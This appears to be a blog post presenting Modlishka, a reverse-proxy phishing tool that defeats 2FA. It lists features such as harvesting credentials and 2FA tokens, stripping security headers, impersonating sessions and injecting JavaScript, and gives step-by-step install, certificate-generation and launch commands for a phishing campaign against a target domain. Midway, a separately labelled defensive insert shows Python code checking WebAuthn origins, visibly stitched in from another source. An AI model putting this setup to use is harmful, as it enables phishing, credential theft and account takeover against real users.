Modlishka is a very powerful Reverse Proxy tool that allows you to run phishing campaigns. It can be very useful to all pentesters since Modlishka is able to show current 2FA weaknesses (bypass 2FA protection on popular websites: Gmail, Yahoo, etc.) and help you find and implement adequate security solutions.
Modlishka: Powerful Reverse Proxy, Phishing NG, Bypassing 2FA
Modlishka is written in Go and allows you to carry out an effective phishing campaign. According to the official documentation, you can adjust the configuration for your chosen domain, and the reverse proxy can be customized through a set of command line options or JSON configuration files.
Modlishka is able to trick 2FA systems by collecting 2FA tokens, without using fake templates (you just need to point it at the target domain). To start pentesting/phishing with Modlishka, all you need is a TLS certificate and a phishing domain.
- Support for the majority of 2FA authentication schemes (by design).
- No website templates (just point Modlishka to the target domain – in most cases, it will be handled automatically).
- Full control of “cross” origin TLS traffic flow from your victims' browsers (through custom new techniques).
- Flexible and easily configurable phishing scenarios through configuration options.
- Stripping the website of all encryption and security headers (back to 90's MITM style).
- User credential harvesting (with context based on URL parameter passed identifiers).
- Can be extended with your ideas through plugins.
- Stateless design. Can be scaled up easily for an arbitrary number of users, e.g. through a DNS load balancer.
- Web panel with a summary of collected credentials and user session impersonation (beta).
- Backdoor free.
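A caveat on the first bullet, as an added example that is not part of Modlishka or this post: origin-bound authenticators such as WebAuthn/FIDO2 security keys are not relayed by a reverse proxy, because the browser writes the origin it is actually on into clientDataJSON and the authenticator signs over it. The relying-party check that rejects such a relayed assertion, in Python; the target and phishing host are taken from this page's example command and the challenge is a constructed value:

```python
import base64
import json

# Real site and phishing host come from this page's example command;
# the challenge is a constructed sample value.
RP_ORIGIN = "https://target-domain.com"
PROXY_ORIGIN = "https://loopback.modlishka.io"
CHALLENGE = b"constructed-challenge-bytes"


def b64url_decode(data: str) -> bytes:
    # WebAuthn uses unpadded base64url; restore padding before decoding.
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def make_client_data(origin: str, challenge: bytes) -> str:
    """clientDataJSON as the browser builds it for an assertion. The browser
    records the origin it is really on, so a login page relayed through a
    reverse proxy carries the proxy's origin; the authenticator then signs
    over the hash of this blob, so the proxy cannot rewrite it."""
    body = {"type": "webauthn.get", "challenge": b64url_encode(challenge),
            "origin": origin}
    return b64url_encode(json.dumps(body).encode())


def verify_client_data(client_data_b64: str, expected_challenge: bytes,
                       rp_origin: str):
    """Relying-party checks on clientDataJSON (WebAuthn authentication
    ceremony steps 7-9): type, challenge and origin must all match.
    Signature verification, which follows these checks, is omitted."""
    try:
        cd = json.loads(b64url_decode(client_data_b64))
        if not isinstance(cd, dict) or not isinstance(cd.get("challenge"), str):
            raise ValueError("not a JSON object with a string challenge")
        challenge = b64url_decode(cd["challenge"])
    except ValueError:  # bad base64, bad UTF-8, bad JSON or bad shape
        return False, "malformed clientDataJSON"
    if cd.get("type") != "webauthn.get":
        return False, "unexpected ceremony type"
    if challenge != expected_challenge:
        return False, "challenge mismatch (stale or replayed ceremony)"
    if cd.get("origin") != rp_origin:
        return False, "origin mismatch: assertion came from %r" % cd.get("origin")
    return True, "ok"
```

Feeding an assertion built with PROXY_ORIGIN to verify_client_data yields the origin-mismatch result, which is why this class of tool works against OTP and push-based 2FA but not against origin-bound authenticators.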
Prerequisites (to run an effective phishing campaign):
- Registered domain name
- Wildcard SSL certificate
First of all, you need to fetch the source code with
$ go get -u github.com/drk1wi/Modlishka
Then configure the
$ openssl genrsa -out MyRootCA.key 2048
$ openssl req -x509 -new -nodes -key MyRootCA.key -sha256 -days 1024 -out MyRootCA.pem
- Replace the const `CA_CERT` variable with the content of the `MyRootCA.pem` file and const `CA_CERT_KEY` with the content of
- Install and set the right trust level for the ‘MyRootCA’ (MyRootCA.pem file) CA in your browser's certificate store (Firefox, Chrome).
Finally, compile and launch:
$ sudo ./dist/proxy -config templates/google.com_gsuite.json
To list available options, simply use
Usage of ./dist/proxy:
base64 encoded TLS certificate
base64 encoded TLS certificate key
base64 encoded Certification Authority certificate
JSON configuration file. Convenient instead of using command line switches.
Credential regexp collector with matching groups. Example: base64(username_regex),base64(password_regex)
Print debug information
Disable security features like anti-SSRF. Disable at your own risk.
Comma separated list of URL patterns and JS base64 encoded payloads that will be injected.
Listening address (default "127.0.0.1")
Listening port (default "443")
Local file to which fetched requests will be written (appended)
Phishing domain to create - Ex.: target.co
The following command will launch the proxy without any encryption:
$ sudo ./dist/proxy -target https://target-domain.com -phishingDomain loopback.modlishka.io -listeningPort 80
- target parameter: the domain that should be proxied,
- phishingDomain parameter: defines the phishing domain.
DEMO: Phishing with Modlishka (author: @drk1wi)